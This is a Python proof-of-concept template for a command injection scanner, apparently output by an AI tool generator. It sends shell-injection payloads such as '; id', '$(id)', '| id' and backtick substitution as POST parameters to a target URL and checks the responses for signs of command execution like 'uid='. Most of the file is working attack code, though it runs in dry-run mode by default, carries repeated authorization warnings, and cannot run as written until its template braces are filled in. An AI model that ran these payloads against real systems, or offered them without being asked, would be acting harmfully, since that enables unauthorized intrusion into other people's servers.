#!/usr/bin/env python3
"""
Command Injection PoC Template
Auto-generated by GlasseyeOS AI Tool Generator
Vulnerability Type: {vulnerability_type}
Target: {target}
Endpoint: {endpoint}
Generated: {timestamp}

CRITICAL: This is a PoC template. Requires explicit authorization.
NEVER execute against unauthorized targets.
"""

import logging
import sys
import requests
import argparse
from typing import Dict, Optional
from datetime import datetime


class CommandInjectionPoC:
    """
    Proof-of-Concept for command injection vulnerability.
    
    WARNING: This tool demonstrates a security vulnerability.
    Only use with explicit authorization on authorized targets.
    """
    
    def __init__(self, target_url: str, verbose: bool = False, dry_run: bool = True):
        """
        Initialize PoC.
        
        Args:
            target_url: Target URL
            verbose: Enable verbose logging
            dry_run: If True, only show what would be sent (RECOMMENDED)
        """
        self.target_url = target_url
        self.verbose = verbose
        self.dry_run = dry_run
        self.setup_logging()
        
        if not dry_run:
            self.logger.warning("DRY RUN DISABLED - This will send actual payloads!")
            self.logger.warning("Ensure you have proper authorization!")
            
    def setup_logging(self):
        """Configure logging."""
        level = logging.DEBUG if self.verbose else logging.INFO
        logging.basicConfig(
            level=level,
            format='%(asctime)s - %(levelname)s - %(message)s'
        )
        self.logger = logging.getLogger('CommandInjectionPoC')
        
    def generate_payloads(self) -> Dict[str, str]:
        """
        Generate command injection payloads.
        
        Returns:
            Dictionary of payload names to payload strings
        """
        # These are examples - customize based on target
        payloads = {{
            'semicolon_separator': '; id',
            'pipe_operator': '| id',
            'and_operator': '&& id',
            'or_operator': '|| id',
            'backtick_substitution': '`id`',
            'dollar_substitution': '$(id)',
            'newline_injection': '%0aid',
            'null_byte_injection': 'test%00; id',
        }}
        
        return payloads
        
    def test_payload(self, payload: str, param_name: str = 'input') -> Dict:
        """
        Test a single payload.
        
        Args:
            payload: Payload string
            param_name: Parameter name to inject into
            
        Returns:
            Test result dictionary
        """
        self.logger.info(f"Testing payload: {{payload}}")
        
        if self.dry_run:
            self.logger.info(f"[DRY RUN] Would send: {{param_name}}={{payload}}")
            return {{
                'payload': payload,
                'dry_run': True,
                'timestamp': datetime.now().isoformat()
            }}
            
        try:
            # Build request
            data = {{param_name: payload}}
            
            # Send request
            response = requests.post(
                self.target_url,
                data=data,
                timeout=10
            )
            
            result = {{
                'payload': payload,
                'status_code': response.status_code,
                'response_length': len(response.text),
                'timestamp': datetime.now().isoformat(),
                'suspicious_indicators': []
            }}
            
            # Check for command execution indicators
            indicators = [
                'uid=',  # Unix id command output
                'gid=',
                'groups=',
                'root',
                'Administrator'
            ]
            
            for indicator in indicators:
                if indicator in response.text:
                    result['suspicious_indicators'].append(indicator)
                    self.logger.warning(f"POSSIBLE VULNERABILITY: Found '{{indicator}}' in response")
                    
            return result
            
        except Exception as e:
            self.logger.error(f"Error testing payload: {{e}}")
            return {{
                'payload': payload,
                'error': str(e),
                'timestamp': datetime.now().isoformat()
            }}
            
    def run_poc(self, param_name: str = 'input') -> Dict:
        """
        Run complete PoC test suite.
        
        Args:
            param_name: Parameter name to test
            
        Returns:
            PoC results summary
        """
        self.logger.info(f"Starting Command Injection PoC against {{self.target_url}}")
        
        if self.dry_run:
            self.logger.info("DRY RUN MODE - No actual requests will be sent")
        else:
            self.logger.warning("LIVE MODE - Ensure you have authorization!")
            
        payloads = self.generate_payloads()
        results = []
        vulnerabilities_found = 0
        
        for name, payload in payloads.items():
            self.logger.info(f"Testing: {{name}}")
            result = self.test_payload(payload, param_name)
            result['payload_name'] = name
            results.append(result)
            
            if result.get('suspicious_indicators'):
                vulnerabilities_found += 1
                
        summary = {{
            'target': self.target_url,
            'endpoint': '{{endpoint}}',
            'total_tests': len(results),
            'vulnerabilities_found': vulnerabilities_found,
            'dry_run': self.dry_run,
            'timestamp': datetime.now().isoformat(),
            'results': results
        }}
        
        self.logger.info(f"PoC complete: {{vulnerabilities_found}} potential vulnerabilities")
        
        return summary
        
    def generate_report(self, results: Dict) -> str:
        """Generate PoC report."""
        report = f"""
{'='*60}
Command Injection PoC Report
{'='*60}
Target: {{results['target']}}
Endpoint: {{results['endpoint']}}
Generated: {{results['timestamp']}}
Dry Run: {{results['dry_run']}}

SUMMARY
-------
Total Tests: {{results['total_tests']}}
Potential Vulnerabilities: {{results['vulnerabilities_found']}}

DETAILED RESULTS
----------------
"""
        
        for result in results['results']:
            report += f"\nPayload: {{result['payload_name']}}\n"
            report += f"  Payload: {{result['payload']}}\n"
            
            if result.get('suspicious_indicators'):
                report += f"  ⚠️  POTENTIAL VULNERABILITY DETECTED\n"
                report += f"  Indicators: {{', '.join(result['suspicious_indicators'])}}\n"
            elif result.get('error'):
                report += f"  Error: {{result['error']}}\n"
            else:
                report += f"  Status: No vulnerability detected\n"
                
        report += f"\n{{'='*60}}\n"
        
        if results['vulnerabilities_found'] > 0:
            report += "\n⚠️  WARNING: Potential vulnerabilities detected!\n"
            report += "Document this finding and report through proper channels.\n"
            
        return report


def main():
    """CLI entry point."""
    parser = argparse.ArgumentParser(
        description='Command Injection PoC',
        epilog='WARNING: Only use with proper authorization!'
    )
    parser.add_argument('--target', required=True, help='Target URL')
    parser.add_argument('--endpoint', default='{{endpoint}}', help='Endpoint path')
    parser.add_argument('--param', default='input', help='Parameter name to test')
    parser.add_argument('--live', action='store_true', help='Disable dry-run (DANGEROUS)')
    parser.add_argument('--verbose', action='store_true', help='Verbose output')
    parser.add_argument('--output', default='poc_report.txt', help='Output report file')
    
    args = parser.parse_args()
    
    # Safety check
    if args.live:
        print("\n⚠️  WARNING: You are about to run this PoC in LIVE mode!")
        print("This will send actual exploit payloads to the target.")
        print("Do you have proper authorization? (yes/no): ", end='')
        
        response = input().strip().lower()
        if response != 'yes':
            print("Aborted. Use --dry-run mode for safe testing.")
            sys.exit(0)
            
    target_url = f"{{args.target}}/{{args.endpoint}}"
    
    poc = CommandInjectionPoC(
        target_url=target_url,
        verbose=args.verbose,
        dry_run=not args.live
    )
    
    results = poc.run_poc(args.param)
    report = poc.generate_report(results)
    
    print(report)
    
    with open(args.output, 'w') as f:
        f.write(report)
        
    print(f"\nReport saved to {{args.output}}")


if __name__ == '__main__':
    main()
